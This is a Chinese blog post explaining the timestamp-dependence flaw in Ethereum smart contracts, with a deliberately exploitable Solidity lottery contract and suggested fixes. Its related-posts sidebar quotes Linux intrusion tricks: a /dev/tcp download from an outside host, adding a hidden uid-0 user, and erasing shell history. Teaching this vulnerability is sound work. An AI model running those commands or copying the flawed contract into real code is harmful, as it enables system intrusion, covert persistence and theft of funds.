智能合约安全漏洞之区块链的时间戳依赖漏洞与解决方法

已于 2022-05-01 23:21:09 修改
阅读量4.7k 收藏 6
点赞数 1
分类专栏: 区块链 文章标签: 智能合约 区块链 以太坊
于 2022-04-15 14:03:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyq55917/article/details/124193282
版权

漏洞原理

时间戳依赖是指智能合约的执行依赖于当前区块的时间戳,如果时间戳不同,那么合约的执行结果也有差别。智能合约中取得时间戳只能依赖某个节点(矿工)来做到。这就是说,合约中取得的时间戳是由运行其代码的节点(矿工)的计算机本地时间决定的。理论上,这个本地时间是可以由矿工控制的。因此,如果在智能合约中不正确地使用区块时间戳,这将是非常危险的。

实例演示

让我们来看下面这个游戏合约,这个合约很容易被矿工利用。

// SPDX-License-Identifier: MIT
pragma solidity >=0.4.22;

contract Roulette {
    uint public pastBlockTime;
 
    // initially contract
    constructor() {}

    // receive function
    receive() external payable {}

    // fallback function used to make a bet
    fallback() external payable {
        require(msg.value == 1 ether); // must send 1 ether to play
        require(block.timestamp != pastBlockTime);  // only 1 transaction per block
        pastBlockTime = block.timestamp;
        if(block.timestamp % 15 == 0) { // winner
            payable(msg.sender).transfer(address(this).balance);
        }
    }
}

这个合约就像一个简单的彩票。每个区块的一笔交易可以押注1个以太币,以获得合约余额的机会。根据以上合约的逻辑,玩家中彩票的概率是1/15。

然而,正如我们所知,如果需要,矿工可以调整时间戳。在这种特殊情况下,如果合约中有足够的以太币,那么矿工就会被激励选择这样一个区块的时间戳,让时间戳 block.timestampnow 取15的模等于0。这样,他们可能会赢得这个合约中锁定的以太币区块奖励。由于每个区块只允许一个人下注,这让合约容易受到攻击。

判定条件

合约中改变重要状态或者判定条件部分使用了时间戳,如在 Solidity 中使用 block.timestampnow 获取当前区块的时间戳。

解决方法

有以下几种解决方法可供参考:

  1. 在合约中不使用区块时间戳作为判定胜负或改变重要状态的决定性因素,通过指定区块编号来更改合约状态的方法可能是更安全的,因为矿工无法轻松的操控区块号。
  2. 采用一个链外的第三方服务,比如使用 Oraclize 来获取随机数。因为 Oraclize 是一种公共基础服务,不会针对特定的合约“作假”,所以这可以认为是“相对安全的”。

我们不建议采用第二种方法,原因是该方法由于采用第三方预言机服务来产生随机数,需要花费更多额外的费用,而且增加了发生新的故障点的可能性。

StevenX5
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
具有增量安全性的两层区块链时间公证-研究论文
06-10
我们提出了一种数字公证人设计,与当前解决方案相比,它具有更高的安全性和更低的成本。 该服务的客户端分三个步骤接收证据。 在第一步中,几乎立即收到证据,但需要很多信任。 在第二步中,需要较少的信任,但会在...
智能合约漏洞——时间操纵
S123456215的博客
05-28 4604
另一种矿工作恶。 合约逻辑如果某人在区块时间正好能被10整除的那个区块中第一个向智能合约转10 ether,那么它将获得之前转入合约的所有赌注。 区块是矿工生成的,矿工可以预先知道下一个区块的时间是否能被15整除。 ...
《我学区块链》—— 三十、以太坊安全时间依赖漏洞
xuguangyuansh的博客
10-26 2375
三十、以太坊安全时间依赖漏洞 时间(Timestamps)是由矿工生成。因此,合约不应该让关键操作依赖于区块时间,例如把时间用作一个生成随机数的种子。Consensys 在他们的指导手册中给出了“12分钟规定”,表明如果你依赖时间的代码能够处理 12 分钟的误差,那么使用block.timestamp 是安全的。 ...
结合GNN和专家知识检测智能合约漏洞
m0_56222998的博客
03-13 2047
翻译自Combining Graph Neural Networks with Expert Knowledge for Smart Contract Vulnerability Detection
php strtotime 2038 时间,php中strtotime与mktime的Y2K38漏洞时间最长为2038年)
weixin_30851637的博客
03-22 436
最近有企业建站系统用户发现一个问题,企业有效期时间修改后保存无效,经仔细检测发现是超过了2038年01月19日的时间就无效了,后来在网上也找到了相关的说法证实。Y2K38 漏洞Y2K38,又称 Unix Millennium Bug,此漏洞将会影响到所有 32 位系统下用 UNIX 时间整数来记录时间的 PHP,及其它编程语言。一个整型的变量所能保存的最大时间为 2038 年01月19 日 03...
SQL时间使用之缓存依赖
码农
12-01 743
通过时间来实现缓存依赖的一种方式 1.创建时间存储表 USE [iwomKeyWord] GO /****** Object: Table [dbo].[CachedTimemap] Script Date: 12/01/2012 01:25:04 ******/ SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER ON GO SET A
智能合约安全漏洞检测技术研究综述——常见漏洞简述
小楼一夜听春雨
09-23 2765
摘自“钱鹏 等:智能合约安全漏洞检测技术研究综述” 三个层面的安全问题:solidity代码层,evm执行层,区块链系统层 漏洞检测方法:形式化验证法,符号执行法,模糊测试法,中间表示法,深度学习法 The Dao重入攻击 parity多签名钱包合约的delegatecall漏洞 bec合约的整数溢出漏洞无限复制代币 EOS.WIN连续随机数攻击 智能合约运行时允许与外部合约函数或接口交互:重复的外部调用 以太坊DAPP总价值应用在博彩、游戏等高风险类别 solidity代码层 1.可重入漏洞 独特的fal
区块链 智能合约中获取不了时间 随机数怎么办
软件工程小施同学 的专栏
10-13 587
有个问题,合约里面怎么获取时间呀,go的wasm合约测试发现,time包获取时间获取不了[Hurt] 似乎所有执行引擎好像都不能获取时间的,因为这会产生随机性。智能合约的执行讲究确定性[破涕为笑] 如果只是为了记录一个时间,从外面获取,作为一个参数,然后传递给合约,合约直接使用就可以了 因为业务场景需要在合约上面生成随机数。。 听说,有人用block的difficulty,或者,keccak256多个参数生成随机数[破涕为笑] 以太猫好像就是这样做的 ...
区块链上的时间技术 [区块链时间和文档验证] .pdf
11-21
区块链上的时间技术 [区块链时间和文档验证] .pdf区块链上的时间技术 [区块链时间和文档验证] .pdf
区块链上的时间技术 [区块链时间和文档验证] .docx
11-21
区块链上的时间技术 [区块链时间和文档验证] .docx区块链上的时间技术 [区块链时间和文档验证] .docx
php中Y2K38的漏洞解决方法实例分析
12-19
本文实例分析了php中Y2K38漏洞解决方法。分享给大家供大家参考。具体分析如下: Y2K38,又称 Unix Millennium Bug, 此漏洞将会影响到所有 32 位系统下用 UNIX 时间整数来记录时间的 PHP,及其它编程语言。 一个...
区块链上的时间技术 [区块链时间和文档验证] (2).pdf
11-21
区块链上的时间技术 [区块链时间和文档验证] (2).pdf区块链上的时间技术 [区块链时间和文档验证] (2).pdf
linux渗透 时间,渗透小技巧之linux
weixin_33315387的博客
05-02 308
1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat c.pl复制代码2.Linux添加uid为0的用户useradd -o -u 0 cnbird复制代码3.bash去掉history记录export ...
区块链常见漏洞万字总结【Web3从业者必备】
FeelTouch Labs
01-10 3601
在自私挖矿攻击(也称为区块扣留)中,攻击者在自己的区块链分叉中挖掘区块,并且不将它们发布到网络。当攻击者计算出一定数量的区块,再将它们发布到网络中,并尝试替代主链。例如,拥有超过 51% 算力的攻击者可以分叉主链并在他的分叉上开始挖矿。攻击者在获得记账权的时候,利用自己手中的权利实施一些计算或者一些操作让系统的随机数产生偏斜,来增加自己下一次获得记账权的可能。攻击者可以利用这些信息来破坏网络中的节点或路由的可用性。攻击者切断了受害者与外界网络间的所有传入和传出的连接,将受害者与网络中的其他节点隔离开来。
智能合约语言(eDSL)—— 并行化方案 1
最新发布
The future is already here it's just not evenly distributed。
05-16 403
Block-STM:一个智能合约并行执行引擎,围绕着软件事务性内存的原则建立的(Software Transactional Memory)。Transaction组成block,每个block在不同的节点执行后都需要具有相同的结果。Block-STM的输入是一个区块(Block),其中包含n个预设了顺序的交易,tx1,tx2…,txn,然后并发执行区块并产生最终状态,但是最终状态与,按顺序执行tx1,tx2,…,txn——每个txj在txj+1开始前执行完成的状态——的状态保持一致。
专访 Staynex 创始人 Yuen Wong:酒店行业的变革者
TechubNews的博客
05-13 724
整理:Tia,Techub News传统酒店业其实已经很中心化了,几大巨头 OTA 平台几乎已经完成对行业的垄断,而酒店商家也不得不受制于平台的规则制度,向平台支付高比例的费用。Staynex 看到了其中的机会,并想利用区块链将酒店业的商业模式 Web3 化。使用 Staynex,每个用户每月只需要支付 5 美元就可以享受特价,通常会比在大多数 OTA 平台上看到的低 15% 到 30%。 并且,Staynex 还可以配合以 travel to earn,通过捕捉像宝可梦一样的生物,在不同的地点获得忠诚度积
波卡 2024 一季度报告:XCM 创下历史新高,JAM 链将引领 Polkadot 2.0 新风向
CryptoBuffett的博客
05-11 815
Polkadot 是一个去中心化区块链计算平台,充当其他平行链(Parachain)的基础层,用于验证和共享安全性。Polkadot 使用 Substrate 区块链开发框架进行构建。此外,Polkadot 的基础层被称为中继链(Relay Chain),它利用提名权益证明(NPoS)共识机制,其状态机编译为 WebAssembly(Wasm)。Polkadot 中继链的核心功能是验证和为其平行链提供安全性。平行链通过平行链槽拍卖添加到中继链中。
区块链中MEV攻击:危害与防护策略
以择人之心择己,以恕己之心恕人。
05-10 490
在加密货币和区块链的世界里,MEV(最大化提取价值,Maximal Extractable Value)攻击是一种日益受到关注的现象,它涉及交易者、矿工或验证者利用信息不对称、交易排序特权以及市场漏洞来获取超额利润。简单来说,MEV攻击者通过识别和利用尚未执行的交易信息,提前做出反应,以确保自己在交易执行时处于更有利的位置。危害概述:用户体验受损:MEV导致的交易重排序或延迟会影响用户的交易体验,有时甚至造成经济损失。市场公平性受损。
IT行业的现状与未来:技术创新引领时代变革
前端程序猿的博客
05-15 242
IT行业正在以惊人的速度发展和变革,成为驱动全球经济和社会发展的重要引擎。无论是云计算、大数据、人工智能、物联网、5G通信还是区块链,每一项技术都在不断进步,并相互融合,推动着技术的前沿发展。未来,我们期待更多行业领袖、技术专家和创新者参与到这一过程中,共同探索IT行业的无限可能,推动技术进步与社会发展的深度融合。让我们一起迎接IT行业的美好未来,创造更加智能、高效和安全的数字化世界!
详细介绍区块链系统层中的时间依赖漏洞、 区块参数依赖漏洞、 交易顺序依赖漏洞
05-29
1. 时间依赖漏洞:在区块链系统中,时间通常用于记录交易或区块的发生时间。攻击者可以通过伪造时间来欺骗系统,从而执行一些不被允许的操作或获取未经授权的访问权限。例如,攻击者可以伪造一个未来的时间来执行一些不应该被执行的操作。 2. 区块参数依赖漏洞:在区块链系统中,区块参数通常用于记录区块的一些重要信息,例如难度值或挖矿奖励。攻击者可以通过伪造区块参数来欺骗系统,从而执行一些不被允许的操作或获取未经授权的访问权限。例如,攻击者可以伪造一个难度值来执行一些不应该被执行的操作。 3. 交易顺序依赖漏洞:在区块链系统中,交易通常按照提交的顺序进行处理。攻击者可以利用这种顺序依赖关系来执行一些不被允许的操作或获取未经授权的访问权限。例如,攻击者可以提交一笔交易,然后再提交另一笔交易,从而欺骗系统执行第二笔交易,而不是第一笔交易。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

StevenX5

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值